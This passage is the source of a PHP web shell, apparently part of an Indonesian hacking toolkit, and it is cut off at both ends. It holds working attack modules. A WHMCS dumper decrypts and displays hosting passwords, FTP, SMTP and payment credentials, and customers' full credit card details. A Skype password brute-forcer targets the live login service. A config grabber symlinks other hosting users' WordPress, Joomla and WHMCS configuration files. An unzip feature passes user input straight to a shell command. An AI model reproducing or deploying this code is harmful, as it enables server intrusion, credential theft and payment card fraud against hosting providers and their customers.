- $query = mysql_query("SELECT * FROM tblhosting where username = 'root' or username = 'vmuserxx' or username = 'vmuser' or username = 'admin' or username = 'Admin' or username = 'administrator' or username = 'Administrator' order by domainstatus");
- echo "<br/><br/><center><table class='explore' style=width:830px;padding:0 1px;>
- <tr><th colspan='6'><span class='b7'>O=:[ CLIENTS ROOT ]:=O</span> </th></tr>
- <tr>
- <th align='center'><b> DOMAIN</b></th>
- <th align='center'><b> STATUS</b></th>
- <th align='center'><b> USERNAME</b></th>
- <th align='center'><b> PASSWORD</b></th>
- <th align='center'><b> DEDICATED IP</b></th>
- <th align='center'><b> ASSIGNED IP</b></th></tr>";
- if(!is_array(mysql_fetch_array($query))){
- echo "<tr><td colspan='6' align='center'>Nothing Found ! :(</td></tr>";
- }
- while($v = mysql_fetch_array($query)){
- echo "<tr>
- <td align='center'> {$v['domain']}</td>
- <td align='center'> {$v['domainstatus']}</td>
- <td align='center'> {$v['username']}</td>
- <td align='center'> ".dec($v['password'],$cc_encryption_hash)."</td>
- <td align='center'> {$v['dedicatedip']}</td>
- <td align='center'> {$v['assignedips']}</td></tr>";
- }
- echo "</table>";
- $query = mysql_query("SELECT *FROM tblregistrars");
- echo "<br/><br/><center><table class='explore' style=width:830px;padding:0 1px;>
- <tr><th colspan='3'><nobr><span class='b7'>O=:[ DOMAIN REGISTRAR ]:=O</span></nobr></th></tr>
- <tr>
- <th align='center'><b>REGISTRAR</b></th>
- <th align='center'><b>SETTING</b></th>
- <th align='center'><b>VALUE</b></th></tr>";
- if(!is_array(mysql_fetch_array($query))){
- echo "<tr><td colspan='3' align='center'>Nothing Found !</td></tr>";
- }
- while($v = mysql_fetch_array($query)){
- $value = (!dec($v['value'],$cc_encryption_hash)) ? "0":dec($v['value'],$cc_encryption_hash);
- echo "<tr>
- <td align='center'>{$v['registrar']}</td>
- <td align='center'>{$v['setting']}</td>
- <td align='center'>$value</td></tr>" ;
- }
- echo "</table>";
- $query = mysql_query("SELECT * FROM tblconfiguration where 1");
- echo "<br/><br/><center><table class='explore' style=width:830px;padding:0 1px;>
- <tr><th colspan='4'> <span class='b7'>O=:[ FTP BACKUP ]:=O</span> </th></tr>
- <tr>
- <th align='center'><b>FTP HOSTNAME</b></th>
- <th align='center'><b>FTP USERNAME</b></th>
- <th align='center'><b>FTP PASSWORD</b></th>
- <th align='center'><b>DESTINATION</b></th></tr>";
- $ftpb = array('FTPBackupHostname',
- 'FTPBackupUsername',
- 'FTPBackupPassword',
- 'FTPBackupDestination');
- if(!is_array(mysql_fetch_array($query))){
- echo "<tr><td colspan='4' align='center'>Nothing Found ! :(</td></tr>";
- }
- while($row = mysql_fetch_array($query)){
- if($row[setting] == $ftpb[0]){
- echo "<tr><td>{$row[value]}</td>";
- $ftpb[0] = xxx;
- }
- elseif($row[setting] == $ftpb[1]){
- echo "<td>{$row[value]}</td>";
- $ftpb[1] = xxx;
- }
- elseif($row[setting] == $ftpb[2]){
- echo "<td>{$row[value]}</td>";
- $ftpb[2] = xxx;
- }
- elseif($row[setting] == $ftpb[3]){
- echo "<td>{$row[value]}</td>";
- $ftpb[3] = xxx;
- }
- }
- echo "</table>";
- $query = mysql_query("SELECT * FROM tblconfiguration where 1");
- echo "<br/><br/><center><table class='explore' style=width:830px;padding:0 1px;>
- <tr><th colspan='4'><span class='b7'>O=:[ SMTP SERVER ]:=O</span> </th></tr>
- <tr>
- <th align='center'><b>SMTP HOST</b></th>
- <th align='center'><b>SMTP USER</b></th>
- <th align='center'><b>SMTP PASS</b></th>
- <th align='center'><b>SMTP PORT</b></th></tr>";
- $smtp = array('SMTPHost',
- 'SMTPUsername',
- 'SMTPPassword',
- 'SMTPPort');
- if(!is_array(mysql_fetch_array($query))){
- echo "<tr><td colspan='4' align='center'>Nothing Found ! :(</td></tr>";
- }
- while($row = mysql_fetch_array($query)){
- if($row[setting] == $smtp[0]){
- echo "<tr><td>{$row[value]}</td>";
- $smtp[0] = xxx;
- }
- elseif($row[setting] == $smtp[1]){
- echo "<td>{$row[value]}</td>";
- $smtp[1] = xxx;
- }
- elseif($row[setting] == $smtp[2]){
- echo "<td>{$row[value]}</td>";
- $smtp[2] = xxx;
- }
- elseif($row[setting] == $smtp[3]){
- echo "<td>{$row[value]}</td>";
- $smtp[3] = xxx;
- }
- }
- echo "</table>";
- $query = mysql_query("SELECT *FROM tblpaymentgateways");
- echo "<br/><br/><center><table class='explore' style=width:830px;padding:0 1px;>
- <tr><th colspan='4'><nobr><span class='b7'>O=:[ PAYMENTS GATEWAY ]:=O</span></nobr></th></tr>
- <tr>
- <th align='center'><b>GATEWAY</b></th>
- <th align='center'><b>SETTING</b></th>
- <th align='center'><b>VALUE</b></th>
- <th align='center'><b>ORDER</b></th></tr>";
- if(!is_array(mysql_fetch_array($query))){
- echo "<tr><td colspan='4' align='center'>Nothing Found !</td></tr>";
- }
- while($v = mysql_fetch_array($query)){
- echo "<tr>
- <td align='center'>{$v['gateway']}</td>
- <td align='center'>{$v['setting']}</td>
- <td align='center'>{$v['value']}</td>
- <td align='center'>{$v['order']}</td> </tr>" ;
- }
- echo "</table>";
- $query = mysql_query("SELECT id FROM tblclients WHERE issuenumber != '' ORDER BY id DESC");
- echo "<br/><br/><center><table class='explore' style=width:830px;padding:0 1px;>
- <tr><th colspan='10'><nobr><span class='b7'>O=:[ CLIENTS CREDIT CARD ]:=O</span></nobr></th></tr>
- <tr>
- <th align='center'><b>CardType</b></th>
- <th align='center'><b>CardNumb</b></th>
- <th align='center'><b>Expdate</b></th>
- <th align='center'><b>IssueNumber</b></th>
- <th align='center'><b>FirstName</b></th>
- <th align='center'><b>LastName</b></th>
- <th align='center'><b>Address</b></th>
- <th align='center'><b>Country</b></th>
- <th align='center'><b>Phone</b></th>
- <th align='center'><b>Email</b></th>
- </tr>";
- if(!is_array(mysql_fetch_array($query))){
- echo "<tr><td colspan='10' align='center'>Nothing Found ! :(</td></tr>";
- }
- while($v = mysql_fetch_array($query)) {
- $cchash = md5($cc_encryption_hash.$v['0']);
- $s = mysql_query("SELECT firstname,lastname,address1,country,phonenumber,cardtype,email,AES_DECRYPT(cardnum,'" . $cchash . "') as cardnum,AES_DECRYPT(expdate,'" . $cchash . "') as expdate,AES_DECRYPT(issuenumber,'" . $cchash . "') as issuenumber FROM tblclients WHERE id='".$v['0']."'");
- $v2=mysql_fetch_array($s);
- echo "<tr>
- <td align='center'>".$v2['cardtype']."</td>
- <td align='center'>".$v2['cardnum']."</td>
- <td align='center'>".$v2['expdate']."</td>
- <td align='center'>".$v2['issuenumber']."</td>
- <td align='center'>".$v2['firstname']."</td>
- <td align='center'>".$v2['lastname']."</td>
- <td align='center'>".$v2['address1']."</td>
- <td align='center'>".$v2['country']."</td>
- <td align='center'>".$v2['phonenumber']."</td>
- <td align='center'>".$v2['email']."</td></tr>";
- }
- echo "</table>";
- $query = mysql_query("SELECT *FROM tblhosting");
- echo "<br/><br/><center>
- <table class='explore' style=width:830px;padding:0 1px;>
- <tr><th colspan='6'><nobr><span class='b7'>O=:[ CLIENTS HOSTING ACCOUNT ]:=O</span></nobr></th></tr>
- <tr>
- <th align='center'><b>DOMAIN</b></th>
- <th align='center'><b>STATUS</b></th>
- <th align='center'><b>USERNAME</b></th>
- <th align='center'><b>PASSWORD</b></th>
- <th align='center'><b>DEDICATED IP</b></th>
- <th align='center'><b>ASSIGNED IP</b></th></tr>";
- if(!is_array(mysql_fetch_array($query))){
- echo "<tr><td colspan='6' align='center'>Nothing Found !</td></tr>";
- }
- while($v = mysql_fetch_array($query)){
- echo "<tr>
- <td align='center'>{$v['domain']}</td>
- <td align='center'>{$v['domainstatus']}</td>
- <td align='center'>{$v['username']}</td>
- <td align='center'>".dec($v['password'],$cc_encryption_hash)."</td>
- <td align='center'>{$v['dedicatedip']}</td>
- <td align='center'>{$v['assignedips']}</td></tr>";
- }
- echo "</table>";
- }
- }
- # x=psan
- elseif(isset($_GET['x']) && ($_GET['x'] == 'pscan')){ ?>
- <form action="?dm=<?php echo $pwd; ?>&x=pscan" method="post">
- <?php
- echo '<center><br/><br/><nobr><b><span class="b7">O=:[ PORT</span> <span class="b8">SCANNER ]:=O</span></b></nobr><br/><br/>';
- $start = strip_tags($_POST['start']);
- $end = strip_tags($_POST['end']);
- $host = strip_tags($_POST['host']);
- if(isset($_POST['host']) && is_numeric($_POST['end']) && is_numeric($_POST['start'])){
- for($i = $start; $i<=$end; $i++){
- $fp = @fsockopen($host, $i, $errno, $errstr, 3);
- if($fp){
- echo "Port <font style='color:#DE3E3E'>$i</font> is <font style='color:#64CF40'>open</font><br>";
- }
- flush();
- }
- } else {
- echo '<input type="hidden" name="y" value="phptools">
- Host <br/>
- <input type="text" class="inputz" name="host" value="localhost"/><br />
- Port Start<br />
- <input type="text" class="inputz" name="start" value="0"/><br />
- Port End:<br />
- <input type="text" class="inputz" name="end" value="5000"/><br />
- <input type="submit" class="inputzbut" value="Scan Ports" />
- </form></center>';
- }
- }
- // ********** x=string ********** //
- elseif(isset($_GET['x']) && ($_GET['x'] == 'string')){ ?>
- <form action="?dm=<?php echo $pwd; ?>&x=string" method="post">
- <br><br><form method='post'>
- <table class="tabnet"><tbody>
- <tr><th colspan="2"> String to Hash </th></tr>
- <tr><td>String : </td>
- <td><input type='text' class='inputz' name='hash_input' value='<? if(isset($_POST['hash_input'])){echo $_POST['hash_input'];}?>' /></td></tr>
- <tr>
- <td align="center" colspan="2"><input type='submit' name='submit_hash' style="width:100%;" class='inputzbut' value='Encode' /></td>
- </tr>
- </tbody>
- </table>
- </form>
- <br><br>
- <?php
- if(isset($_POST['submit_hash'])) {
- if(isset($_POST['hash_input'])) {
- $hash_input = $_POST['hash_input'];
- }
- if($hash_input=="") {
- echo 'Nothing Inserted!';
- } else {
- if (isset($hash_input)) {
- echo "<table class='tabnet'><tbody>
- <tr><th colspan='2'> Hash </th></tr>";
- foreach (hash_algos() as $hash_setoption) { $calculate_hash = hash($hash_setoption, $hash_input, false);
- echo "<tr><td width='70' align='center'><font style='color:#9F7CEB'>$hash_setoption</font></td><td><font style='color:#5BC740'>$calculate_hash</font></td></tr>";
- }
- echo "</tbody></table>";
- }
- }
- }
- }
- # x=cc
- elseif(isset($_GET['x']) && ($_GET['x'] == 'cc')){ ?>
- <form action="?dm=<?php echo $pwd; ?>&x=cc" method="post">
- <?php
- class CreditCardValidator {
- private $arrCardInfo = array('status' => null, 'type' => null, 'substring' => null, 'reason' => null);
- private $arrCardTypes = array('amex' => array('name' => 'American Express','active' => true, 'iinrange' => '34,37','length' => 15), 'discover' => array('name' => 'Discover','active' => true,'iinrange' => '6011,622126-622925,644-649,65','length' => 16), 'mastercard' => array('name' => 'MasterCard','active' => true,'iinrange' => '51-55','length' => 16), 'visa' => array('name' => 'VISA','active' => true,'iinrange' => '4','length' => 16));
- private $arrAcceptedMII = array(3, 4, 5, 6);
- public function Validate($strCardNumber=null, $strCardType=null) {
- if($strCardNumber === null) {
- $this->arrCardInfo['failure'] = 'format';
- $this->arrCardInfo['status'] = 'invalid';
- return false;
- }
- if(($strCardType !== null) && !in_array($strCardType, $this->arrCardTypes)) {
- $this->arrCardInfo['failure'] = 'cardtype';
- $this->arrCardInfo['status'] = 'invalid';
- return false;
- }
- if(!$this->CheckMII($strCardNumber)) {
- $this->arrCardInfo['failure'] = 'mii';
- $this->arrCardInfo['status'] = 'invalid';
- return false;
- }
- if(!$this->CheckIIN($strCardNumber)) {
- $this->arrCardInfo['failure'] = 'iin';
- $this->arrCardInfo['status'] = 'invalid';
- return false;
- }
- if(!$this->CheckLuhn($strCardNumber)) {
- $this->arrCardInfo['failure'] = 'algorithm';
- $this->arrCardInfo['status'] = 'invalid';
- return false;
- }
- $this->arrCardInfo['status'] = 'valid';
- $this->arrCardInfo['substring'] = $this->GetCardSubstring($strCardNumber);
- return true;
- }
- private function CleanCardNumber($strCardNumber=null) {
- return preg_replace('/[^0-9]/', '', $strCardNumber);
- }
- private function GetCardSubstring($strCardNumber=null) {
- if(strstr($strCardNumber, '*') && (substr($strCardNumber) < 10)) return $strCardNumber;
- $strCardNumber = $this->CleanCardNumber($strCardNumber);
- return $strCardNumber ? '***'.substr($strCardNumber, (strlen($strCardNumber) - 4), 4) : '';
- }
- private function CheckMII($strCardNumber=null) {
- $strCardNumber = $this->CleanCardNumber($strCardNumber);
- if(!$strCardNumber) return false;
- $intFirstDigit = (int) substr($strCardNumber, 0, 1);
- if(!in_array($intFirstDigit, $this->arrAcceptedMII)) return false;
- return true;
- }
- private function CheckLuhn($strCardNumber=null) {
- $strCardNumber = (string) $this->CleanCardNumber($strCardNumber);
- $strCheckDigit = substr($strCardNumber, (strlen($strCardNumber) - 1), 1);
- $strCardNumberReverse = strrev($strCardNumber);
- $intTotal = 0;
- for($i = 1; $i <= strlen($strCardNumberReverse); $i++) {
- $intVal = (int) ($i % 2) ? $strCardNumberReverse[$i-1] : ($strCardNumberReverse[$i-1] * 2);
- if($intVal > 9) {
- $strVal = (string) $intVal;
- $intVal = (int) ($strVal[0] + $strVal[1]);
- }
- $intTotal += $intVal;
- }
- return (($intTotal % 10) == 0) ? true : false;
- }
- private function CheckIIN($strCardNumber=null) {
- $strCardNumber = $this->CleanCardNumber($strCardNumber);
- if(!$strCardNumber) return false;
- $arrCardTypePossibilities = array();
- foreach($this->arrCardTypes as $strShortName => $arrCardType) {
- if($arrCardType['active'] === true) {
- $strLen = strlen($strCardNumber);
- if($strLen == $arrCardType['length']) {
- $arrRangeSets = explode(',', $arrCardType['iinrange']);
- foreach($arrRangeSets as $strRangeSetItem) {
- $arrStrRanges = explode('-', $strRangeSetItem);
- if(count($arrStrRanges) > 1) {
- for($i = $arrStrRanges[0]; $i <= $arrStrRanges[1]; $i++) {
- if((strpos((string) $strCardNumber, (string) $i) === 0) && !in_array($strShortName, $arrCardTypePossibilities)) $arrCardTypePossibilities[] = $strShortName;
- }
- } else {
- if((strpos((string) $strCardNumber, (string) trim($arrStrRanges[0])) === 0) && !in_array($strShortName, $arrCardTypePossibilities)) $arrCardTypePossibilities[] = $strShortName;
- }
- }
- }
- }
- }
- $this->arrCardInfo['type'] = implode('|', $arrCardTypePossibilities);
- return count($arrCardTypePossibilities) ? true : false;
- }
- public function GetCardInfo() {
- return $this->arrCardInfo;
- }
- public function GetCardName($strCardShortName=null) {
- return isset($this->arrCardTypes[$strCardShortName]['name']) ? $this->arrCardTypes[$strCardShortName]['name'] : '';
- }
- }
- $CCV = new CreditCardValidator();
- if(isset($_POST['cardnum'])) :
- $CCV->Validate($_POST['cardnum']);
- $CARDINFO = $CCV->GetCardInfo();
- endif;
- ?>
- <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
- <html lang="en"><head>
- <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
- <title>Credit Card Validation - Test Page</title><style type="text/css">
- body{ font-size: 13px; color: #333; font-family: 'georgia', 'times new roman', serif; margin: 20px; }
- fieldset{ border: 0; margin: 0; font-style: italic; }
- legend{ display: none; }
- label{ width: 100%; float: left; clear: both; font-size: 15px; font-weight: bold; color: #999; line-height: 3; }
- input, textarea{ font-size: 18px; line-height: 1.4; padding: 10px; border: 2px solid #eee; }
- textarea{ background-color: #eee; color: blue; }
- h2{ font-size: 30px; }
- #fs-input input{ width: 500px; margin-bottom: 15px; }
- #fs-input input.cb{ width: auto; }
- #fs-submit input{ background-color: #333; color: lightyellow; }
- </style>
- </head>
- <body><h2>Credit Card Tester</h2>
- <form action="" method="post">
- <fieldset id="fs-input"><legend></legend>
- <label>Card Number</label>
- <input type="text" style="color:#FF0000;background-color:#000000" name="cardnum" value="<?php echo @$_POST['cardnum']; ?>"><br>
- <input type="checkbox" name="showgeek" class="cb" value="1"<?php if(isset($_POST['showgeek'])) echo ' checked'; ?>> Show Geeky Output
- </fieldset>
- <fieldset id="fs-submit">
- <legend></legend>
- <label></label>
- <input type="submit" value="Check CC">
- </fieldset>
- <?php if(isset($_POST['cardnum'])) : ?>
- <hr>
- <h2>Result</h2><fieldset id="fs-result">
- <legend></legend><label></label>
- <strong>Status:</strong> <?php echo strtoupper($CARDINFO['status']); ?><br>
- <strong>Card Type: </strong> <?php echo $CCV->GetCardName($CARDINFO['type']); ?>
- </fieldset>
- <?php endif; ?>
- <?php if(isset($_POST['showgeek'])) : ?>
- <fieldset id="fs-geek-result">
- <legend></legend>
- <label>Geeky Result</label>
- <textarea style="color:#FF0000;background-color:#000000" rows="40" cols="80"><?php print_r($CCV); ?></textarea>
- </fieldset>
- <?php endif; ?>
- </form></body></html>
- <?php }
- # x=unzip
- elseif(isset($_GET['x']) && ($_GET['x'] == 'unzip')){
- ?>
- <form action="?dm=<?php echo $pwd; ?>&x=unzip" method="post">
- <center><br/><br/><nobr><span class="b7">O=:[ ZIP FILE</span> <span class="b8">EXTRACTOR ]:=O</nobr><br/><br/>
- <?php
- $file = $_POST['file'];
- if (isset($file)){
- echo "<nobr><b>[+] PROSES BONGKAR [+]</b><br><br></nobr>";
- system('unzip -o ' . $file);
- echo "<br/>";
- exit;
- }
- $handler = opendir(".");
- echo "<center><b>Pilih File Yg Mau Di Unzip :<b><br> " . "<br>";
- echo '<form action="" method="get">';
- $found = false;
- while ($file = readdir($handler)) {
- if (preg_match ("/.zip$/i", $file)) {
- echo '<input type="radio" name="file" value=' . $file . '> ' . $file . '<br>';
- $found = true;
- }
- }
- closedir($handler);
- if ($found == false)
- echo "<br><br><b>[+] GA ADA FILE EXTENSI ZIP [+]<b><br>";
- else
- echo '<br><br><inpuy type="submit" value="Unzip File">';
- echo "</form>";
- ?>
- <?php }
- # x=analyzer
- elseif(isset($_GET['x']) && ($_GET['x'] == 'analyzer')){
- ?>
- <form action="?dm=<?php echo $pwd; ?>&x=analyzer" method="post">
- <center><br/><br/><nobr><span class="b7">O=:[ HASH TYPE</span> <span class="b8">ANALYZER ]:=O</nobr><br/><br/> <form method=POST>
- <input type="text" style="color:#FF0000;background-color:#000000" name="hashToAnalyze" size=60><input type="submit" style="color:#FF0000;background-color:#000000" value="Check Hash Now" name="analyzieNow"></form></center>
- <?php
- if($_POST['analyzieNow']){
- $hash = $_POST['hashToAnalyze'];
- $subHash = substr($hash,0,3);
- if($subHash =='$ap' && strlen($hash) == 37){
- echo "The Hash : ".$hash." is : MD5(APR) Hash";
- }
- else if($subHash =='$1$' && strlen($hash) == 34){
- echo "The Hash : ".$hash." is : MD5(UNIX) Hash";
- }
- else if($subHash =='$H$' && strlen($hash) == 35){
- echo "The Hash : ".$hash." is : MD5(phpBB3) Hash";
- }
- else if(strlen($hash) == 29){
- echo "The Hash : ".$hash." is : MD5(Wordpress) Hash";
- }
- else if($subHash =='$5$' && strlen($hash) == 64){
- echo "The Hash : ".$hash." is : SHA256(UNIX) Hash";
- }
- else if($subHash =='$6$' && strlen($hash) == 128){
- echo "The Hash : ".$hash." is : SHA512(UNIX) Hash";
- }
- else if(strlen($hash) == 56){
- echo "The Hash : ".$hash." is : SHA224 Hash";
- }
- else if(strlen($hash) == 64){
- echo "The Hash : ".$hash." is : SHA256 Hash";
- }
- else if(strlen($hash) == 96){
- echo "The Hash : ".$hash." is : SHA384 Hash";
- }
- else if(strlen($hash) == 128){
- echo "The Hash : ".$hash." is : SHA512 Hash";
- }
- else if(strlen($hash) == 40){
- echo "The Hash : ".$hash." is : MySQL v5.x Hash";
- }
- else if(strlen($hash) == 16){
- echo "The Hash : ".$hash." is : MySQL Hash";
- }
- else if(strlen($hash) == 13){
- echo "The Hash : ".$hash." is : DES(Unix) Hash";
- }
- else if(strlen($hash) == 32){
- echo "The Hash : ".$hash." is : MD5 Hash";
- }
- else if(strlen($hash) == 4){
- echo "The Hash : ".$hash." is : [CRC-16]-[CRC-16-CCITT]-[FCS-16]";}
- else {
- echo "Error : Can't Detect Hash Type";
- }
- }
- ?>
- <?php }
- # x=skype
- elseif(isset($_GET['x']) && ($_GET['x'] == 'skype')){
- ?>
- <form action="?dm=<?php echo $pwd; ?>&x=skype" method="post">
- <br/><br/><form method='POST'>
- <center><br/><br/>
- <img src='http://www.in-travel.info/easter2013/wp-content/uploads/2012/12/Skype-Logo-300x133.png'><br/><br/><nobr><span class='b7'>O=:[ BRUTEFORCE</span> <span class='b8'>SKYPE ACCOUNT ]:=O</span></nobr><br/><br/>
- <nobr>Username : <input style='color:#FF0000;background-color:#000000' type='text' name='skypename' placeholder='Skype Name' size='38'><br>
- <textarea style='color:#FF0000;background-color:#000000' rows='16' cols='38' name='passwords' placeholder='passwords'></textarea><br><br>
- <input style='color:#FF0000;background-color:#000000' type='submit' value='Start BruteForce' name='brute'><br>
- </center>
- </form>
- <?php
- @set_time_limit(0);
- $skype = "https://login.skype.com/login?application=account&return_url=https%3A%2F%2Fsecure.skype.com%2Faccount%2Flogin";
- # Username & Password
- $username = $_POST['skypename'];
- $password = explode("\r\n", $_POST['passwords']);
- $time = date_default_timezone_set("Asia/Jakarta");
- $date = date('H:i:s');
- $header = "HTTP/1.1 302";
- function xsecurity($skype){
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, $skype);
- curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
- curl_setopt($ch, CURLOPT_HEADER, 1);
- curl_setopt($ch, CURLOPT_POST, 1);
- curl_setopt($ch,CURLOPT_COOKIEJAR, getcwd()."./cookie.txt");
- curl_setopt($ch,CURLOPT_COOKIEFILE, getcwd()."./cookie.txt");
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- $run = curl_exec($ch);
- preg_match('/<input type="hidden" name="session_token" value="(.*?)"/', $run, $hash);
- preg_match('/<input type="hidden" name="pie" id="pie" value="(.*?)"/', $run, $piie);
- preg_match('/<input type="hidden" name="etm" id="etm" value="(.*?)"/', $run, $etmm);
- return $hash[1]."|:|".$piie[1]."|:|".$etmm[1];}
- $xsec = explode("|:|" ,xsecurity($skype));
- $token = $xsec[0];
- $pie = $xsec[1];
- $etm = $xsec[2];
- function brute($skype,$username,$pass,$header){
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, $skype);
- curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
- curl_setopt($ch, CURLOPT_HEADER, 1);
- curl_setopt($ch, CURLOPT_POST, 1);
- curl_setopt($ch, CURLOPT_POSTFIELDS, "username={$username}&password={$pass}&timezone_field=%2B03%7C00&pie={$pie}&etm={$etm}&js_time={$date}&session_token={$token}&application=account&return_url=https%3A%2F%2Fsecure.skype.com%2Faccount%2Flogin");
- curl_setopt($ch,CURLOPT_COOKIEJAR, getcwd()."./cookie.txt");
- curl_setopt($ch,CURLOPT_COOKIEFILE, getcwd()."./cookie.txt");
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- $brute = curl_exec($ch);
- if(strstr($brute, $header)){
- echo "<br><br><nobr><center><span class='b11'>[+] Password Cracked is <b>{$pass}</b> --> <b>{$username}</b></span></center>";
- }
- return $brute;
- }
- if($_POST['brute']){
- foreach($password as $pass)
- {
- brute($skype,$username,$pass,$header);
- }
- }
- ?>
- <?php }
- # x=grabber
- elseif(isset($_GET['x']) && ($_GET['x'] == 'grabber')){
- ?>
- <form action="?dm=<?php echo $pwd; ?>&x=grabber" method="post">
- <center><br/><br/><nobr><span class="b7">O=:[ CONFIG</span> <span class="b8">GRABBER ]:=O</nobr><br/><br/><form method="POST">
- <textarea style="color:#FF0000;background-color:#000000"cols="50" rows="20" name="passwd" ></textarea><br/><br/>
- <input name="cat" size="80" style="color:#FF0000;background-color:#000000" value="START GRAB CONFIG" type="submit"><br/></form>
- <?php
- @error_reporting(0);
- @set_time_limit(0);
- if($_POST["cat"] && !$_POST["passwd"]==""){
- echo "Checking Functions ...<br>";
- $functions=@ini_get("disable_functions");
- if(eregi("symlink",$functions)){
- die("<center><br/><br/><nobr><span class='b9'>DISABLE FUNCTIONS IS ON</span></nobr><br/><br/></center>");
- }
- @mkdir("dm_grab", 0755);
- @chdir("dm_grab");
- $htaccess="
- Options all
- Options +Indexes
- Options +FollowSymLinks
- DirectoryIndex Sux.html
- AddType text/plain .php
- AddHandler server-parsed .php
- AddType text/plain .html
- AddHandler txt .html
- Require None
- Satisfy Any";
- file_put_contents(".htaccess",$htaccess,FILE_APPEND);
- $passwd=$_POST["passwd"];
- $passwd=explode("\n",$passwd);
- echo "Start Symlinking ...<br>";
- foreach($passwd as $pwd){
- $pawd=explode(":",$pwd);
- $user =$pawd[0];
- // Now symlink Them
- @symlink('/home/'.$user.'/public_html/includes/configure.php',$user.'-shop.txt');
- @symlink('/home/'.$user.'/public_html/os/includes/configure.php',$user.'-shop-os.txt');
- @symlink('/home/'.$user.'/public_html/oscom/includes/configure.php',$user.'-oscom.txt');
- @symlink('/home/'.$user.'/public_html/oscommerce/includes/configure.php',$user.'-oscommerce.txt');
- @symlink('/home/'.$user.'/public_html/oscommerces/includes/configure.php',$user.'-oscommerces.txt');
- @symlink('/home/'.$user.'/public_html/shop/includes/configure.php',$user.'-shop2.txt');
- @symlink('/home/'.$user.'/public_html/shopping/includes/configure.php',$user.'-shop-shopping.txt');
- @symlink('/home/'.$user.'/public_html/sale/includes/configure.php',$user.'-sale.txt');
- @symlink('/home/'.$user.'/public_html/amember/config.inc.php',$user.'-amember.txt');
- @symlink('/home/'.$user.'/public_html/config.inc.php',$user.'-amember2.txt');
- @symlink('/home/'.$user.'/public_html/members/configuration.php',$user.'-members.txt');
- @symlink('/home/'.$user.'/public_html/config.php',$user.'-4images1.txt');
- @symlink('/home/'.$user.'/public_html/forum/includes/config.php',$user.'-forum.txt');
- @symlink('/home/'.$user.'/public_html/forums/includes/config.php',$user.'-forums.txt');
- @symlink('/home/'.$user.'/public_html/admin/conf.php',$user.'-5.txt');
- @symlink('/home/'.$user.'/public_html/admin/config.php',$user.'-4.txt');
- @symlink('/home/'.$user.'/public_html/wp-config.php',$user.'-wp13.txt');
- @symlink('/home/'.$user.'/public_html/wp/wp-config.php',$user.'-wp13-wp.txt');
- @symlink('/home/'.$user.'/public_html/WP/wp-config.php',$user.'-wp13-WP.txt');
- @symlink('/home/'.$user.'/public_html/wp/beta/wp-config.php',$user.'-wp13-wp-beta.txt');
- @symlink('/home/'.$user.'/public_html/beta/wp-config.php',$user.'-wp13-beta.txt');
- @symlink('/home/'.$user.'/public_html/press/wp-config.php',$user.'-wp13-press.txt');
- @symlink('/home/'.$user.'/public_html/wordpress/wp-config.php',$user.'-wp13-wordpress.txt');
- @symlink('/home/'.$user.'/public_html/Wordpress/wp-config.php',$user.'-wp13-Wordpress.txt');
- @symlink('/home/'.$user.'/public_html/blog/wp-config.php',$user.'-wp13-Wordpress.txt');
- @symlink('/home/'.$user.'/public_html/wordpress/beta/wp-config.php',$user.'-wp13-wordpress-beta.txt');
- @symlink('/home/'.$user.'/public_html/news/wp-config.php',$user.'-wp13-news.txt');
- @symlink('/home/'.$user.'/public_html/new/wp-config.php',$user.'-wp13-new.txt');
- @symlink('/home/'.$user.'/public_html/blog/wp-config.php',$user.'-wp-blog.txt');
- @symlink('/home/'.$user.'/public_html/beta/wp-config.php',$user.'-wp-beta.txt');
- @symlink('/home/'.$user.'/public_html/blogs/wp-config.php',$user.'-wp-blogs.txt');
- @symlink('/home/'.$user.'/public_html/home/wp-config.php',$user.'-wp-home.txt');
- @symlink('/home/'.$user.'/public_html/protal/wp-config.php',$user.'-wp-protal.txt');
- @symlink('/home/'.$user.'/public_html/site/wp-config.php',$user.'-wp-site.txt');
- @symlink('/home/'.$user.'/public_html/main/wp-config.php',$user.'-wp-main.txt');
- @symlink('/home/'.$user.'/public_html/test/wp-config.php',$user.'-wp-test.txt');
- @symlink('/home/'.$user.'/public_html/arcade/functions/dbclass.php',$user.'-ibproarcade.txt');
- @symlink('/home/'.$user.'/public_html/arcade/functions/dbclass.php',$user.'-ibproarcade.txt');
- @symlink('/home/'.$user.'/public_html/joomla/configuration.php',$user.'-joomla2.txt');
- @symlink('/home/'.$user.'/public_html/protal/configuration.php',$user.'-joomla-protal.txt');
- @symlink('/home/'.$user.'/public_html/joo/configuration.php',$user.'-joo.txt');
- @symlink('/home/'.$user.'/public_html/cms/configuration.php',$user.'-joomla-cms.txt');
- @symlink('/home/'.$user.'/public_html/site/configuration.php',$user.'-joomla-site.txt');
- @symlink('/home/'.$user.'/public_html/main/configuration.php',$user.'-joomla-main.txt');
- @symlink('/home/'.$user.'/public_html/news/configuration.php',$user.'-joomla-news.txt');
- @symlink('/home/'.$user.'/public_html/new/configuration.php',$user.'-joomla-new.txt');
- @symlink('/home/'.$user.'/public_html/home/configuration.php',$user.'-joomla-home.txt');
- @symlink('/home/'.$user.'/public_html/vb/includes/config.php',$user.'-vb-config.txt');
- @symlink('/home/'.$user.'/public_html/vb3/includes/config.php',$user.'-vb3-config.txt');
- @symlink('/home/'.$user.'/public_html/cc/includes/config.php',$user.'-vb1-config.txt');
- @symlink('/home/'.$user.'/public_html/includes/config.php',$user.'-includes-vb.txt');
- @symlink('/home/'.$user.'/public_html/forum/includes/class_core.php',$user.'-vbluttin-class_core.php.txt');
- @symlink('/home/'.$user.'/public_html/vb/includes/class_core.php',$user.'-vbluttin-class_core.php1.txt');
- @symlink('/home/'.$user.'/public_html/cc/includes/class_core.php',$user.'-vbluttin-class_core.php2.txt');
- @symlink('/home/'.$user.'/public_html/whm/configuration.php',$user.'-whm15.txt');
- @symlink('/home/'.$user.'/public_html/central/configuration.php',$user.'-whm-central.txt');
- @symlink('/home/'.$user.'/public_html/whm/whmcs/configuration.php',$user.'-whm-whmcs.txt');
- @symlink('/home/'.$user.'/public_html/whm/WHMCS/configuration.php',$user.'-whm-WHMCS.txt');
